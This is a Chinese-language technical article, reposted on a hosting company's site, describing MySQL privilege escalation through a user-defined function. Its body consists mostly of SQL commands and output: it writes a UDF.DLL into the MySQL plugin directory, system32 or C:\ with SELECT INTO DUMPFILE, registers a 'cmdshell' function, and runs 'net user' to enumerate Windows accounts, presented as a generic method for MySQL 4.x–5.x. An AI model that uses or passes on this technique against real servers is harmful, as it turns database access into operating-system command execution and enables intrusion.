您好,欢迎来到思海网络,我们将竭诚为您提供优质的服务! 诚征网络推广 | 网站备案 | 帮助中心 | 软件下载 | 购买流程 | 付款方式 | 联系我们 [ 会员登录/注册 ]
促销推广
客服中心
业务咨询
有事点击这里…  531199185
有事点击这里…  61352289
点击这里给我发消息  81721488
有事点击这里…  376585780
有事点击这里…  872642803
有事点击这里…  459248018
有事点击这里…  61352288
有事点击这里…  380791050
技术支持
有事点击这里…  714236853
有事点击这里…  719304487
有事点击这里…  1208894568
有事点击这里…  61352289
在线客服
有事点击这里…  531199185
有事点击这里…  61352288
有事点击这里…  983054746
有事点击这里…  893984210
当前位置:首页 >> 技术文章 >> 文章浏览
技术文章

mysql提权 udf方法更新

添加时间:2011-1-22  添加: admin 

mysql提权 udf方法更新
 
 
文章录入:7747.Net    责任编辑:7747.Net  更新时间:2011-1-21 10:38:18 39 
 【字体:小 大】
 
heimian

最近渗透时要用mysql udf,发现导出system32下的方法注册不了DLL,原来一些mysql新版变到插件目录了。

mysql> select @@version;
+———–+
| @@version |
+———–+
| 5.1.41 |
+———–+
1 row in set (0.00 sec)

mysql> select data from shell into DUMPFILE ‘.\\lib\\plugin\\UDF.DLL’;
 

ERROR 1 (HY000): Can’t create/write to file ‘\Program Files\xampp\mysql\data\lib\plugin\UDF.DLL’ (Errcode: 2)
mysql>

用这方法暴出了插件的安装目录.下面是通用的导出方法:

mysql> select data from shell into DUMPFILE ‘..\\lib\\plugin\\UDF.DLL’;
Query OK, 1 row affected (0.00 sec)
………………
mysql> select cmdshell(‘cmd.exe /c net user’);
 

\\ 的用户帐户

——————————————————————————-

__vmware_user__ Administrator ASPNET
Guest HelpAssistant SUPPORT_388945a0
把你的mysqludf改为:
select data from shell into DUMPFILE ‘..\\lib\\plugin\\UDF.DLL’;
select data from shell into DUMPFILE ‘c:\\windows\\system32\\UDF.DLL’;
select data from shell into DUMPFILE ‘c:\\UDF.DLL’; //某些版本只能在C盘根目录
Create Function cmdshell returns string soname ‘UDF.DLL’;
这样就比较通用了,对4.x-5.x都有效
关健词:MYSQL,UDF

分享到:

顶部 】 【 关闭
版权所有:佛山思海电脑网络有限公司 ©1998-2024 All Rights Reserved.
联系电话:(0757)22630313、22633833
中华人民共和国增值电信业务经营许可证: 粤B1.B2-20030321 备案号:粤B2-20030321-1
网站公安备案编号:44060602000007 交互式栏目专项备案编号:200303DD003  
察察 工商 网安 举报有奖  警警  手机打开网站